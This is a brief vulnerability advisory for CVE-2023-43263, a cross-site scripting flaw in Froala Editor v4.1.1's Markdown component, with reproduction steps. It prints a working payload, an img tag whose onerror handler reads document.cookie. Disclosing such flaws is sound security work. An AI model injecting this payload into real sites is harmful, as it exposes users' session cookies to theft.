CVE ID: CVE-2023-43263
Vulnerability Type: Cross-Site Scripting
Description: Cross-site scripting (XSS) vulnerability in Froala Editor v.4.1.1 allows attackers to execute arbitrary code via the Markdown component.
Steps to reproduce:
Enter payload in markdown component input:
<a title ="a
<img src=x onerror=console.log(document.cookie)>xss</a>
Reference: